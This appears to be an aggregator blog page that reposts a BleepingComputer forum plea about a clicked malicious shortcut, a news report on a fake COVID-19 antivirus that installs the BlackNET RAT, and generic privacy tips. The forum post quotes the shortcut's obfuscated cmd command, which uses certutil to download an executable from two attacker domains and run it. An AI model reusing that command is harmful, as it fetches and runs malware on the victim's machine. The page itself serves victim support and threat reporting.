Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer

Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer


Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer

Posted: 23 Mar 2020 04:12 PM PDT

Fake Corona Antivirus Software Used to Install Backdoor Malware

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former was already taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active but it had its contents altered, with the malicious links removed and a donation link added to support the scammers' efforts — spoiler alert, no donations were made until now.

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app.

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone would fall this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their systems if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable to detect if it's being analyzed within a VM and it will check for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel
BlackNET command panel

The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).

5 ways to protect your privacy online - AZ Big Media

Posted: 23 Mar 2020 10:31 AM PDT

With each passing year, more and more services are going online. You're required to disclose a ton of personal details and information over the internet, leaving you vulnerable to a privacy breach. Your computer likely contains banking information, personal tax details, contact information, and many important documents. This data is necessary, and it's unavoidable that you'll need to divulge it online at some point.

That said, you must know how to protect your information correctly to avoid any breaches of your sensitive data. If you are a victim of fraud or your data is hacked, you could face financial implications, negative impacts on your credit rating, and lots of stress.

Here are five simple ways to ensure that your private information stays private online.

1. Use an Antivirus

The most important way you can protect your privacy is by using quality antivirus software. Antivirus software will stop harmful viruses and spyware from accessing your computer in the first place. There are new types of viruses popping up each day, and they can delete your files, access your personal data, and even use your computer to attack another. Ransomware is becoming increasingly common, and it's a doozy. It encrypts all your data, preventing you from accessing it. You will need to pay a fee to the criminals for them to decrypt it, and there's no guarantee they even will. Antivirus software will give you up-to-date protection from all known virus strains.

2. Strengthen your passwords

While it can be tempting to use the same password for everything, it's definitely not advised. If a hacker or cybercriminal decodes even one of your passwords, they will then have access to everything. Make sure you use passwords that are not easy to guess, such as birthdays, your partner's name, or the school you went to. Ensure passwords contain a good mix of letters, both lowercase and uppercase, numbers, and symbols if they allow it. It's also a good idea to get in the habit of updating your passwords regularly to make sure you're protected. Another good option is using a password manager, which generates random passwords for you and stores them safely.

3. Delete cookies

Browser cookies – not the edible kind – are text files that are stored in your browser, and they provide information about your activity to each website. While this is not always a bad thing and is generally used to enhance your user experience, but can sometimes be a virus in disguise. Usually, a website will ask you to approve its use of cookies when you first arrive. This means the site will track your data, such as what products you look at on a web-store, or your login details. This data is then used to customize your experience and provide insight into customer habits for marketing purposes.

Viruses and malware can sometimes disguise themselves as cookies, so you should be careful what you accept. Most browsers allow you to block cookies, but make sure you go into your settings and delete cookies regularly because they have a way of sneaking in. They have also evolved, with zombie cookies reappearing even after being removed. By blocking cookies and regularly deleting them, you can prevent viruses from getting into your computer this way.

4. Set your social media profiles to private

Almost everyone uses social media in some form. Whether your preferred platform is Facebook, Instagram, or Snapchat, make sure you set your profiles to private. That way, you have control over who has access to your information. You may not think that anyone would bother digging up your details, but when you have a public profile, you put yourself at risk. Everything you've ever posted and been tagged in is accessible, including embarrassing photos, job history, contact details, addresses, and more. You also leave yourself open to identity theft and even stalking.

5. Always log out of accounts

Even if you're browsing on your home network or cellphone, always log out of your accounts when you finish. Leaving your accounts logged in will make you an easy target for cybercriminals trying to access your information. It goes without saying that signing out of your online banking is extremely important, but hackers have other ways of getting your details. If you log into an online shopping platform, such as Amazon, or even Uber/Uber Eats, you likely have a payment method linked to your account. That means there is the potential to access your account and your finances.

Final Thoughts

People are spending so much more time online and using the internet for almost everything. From dealing with your finances to doing your shopping, your personal data is all over the internet. Your privacy is important, and you need to take all the necessary steps to ensure you're protected against a data breach. Using these strategies, you can be aware of potential risks and work to prevent your information from falling into the wrong hands. 

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US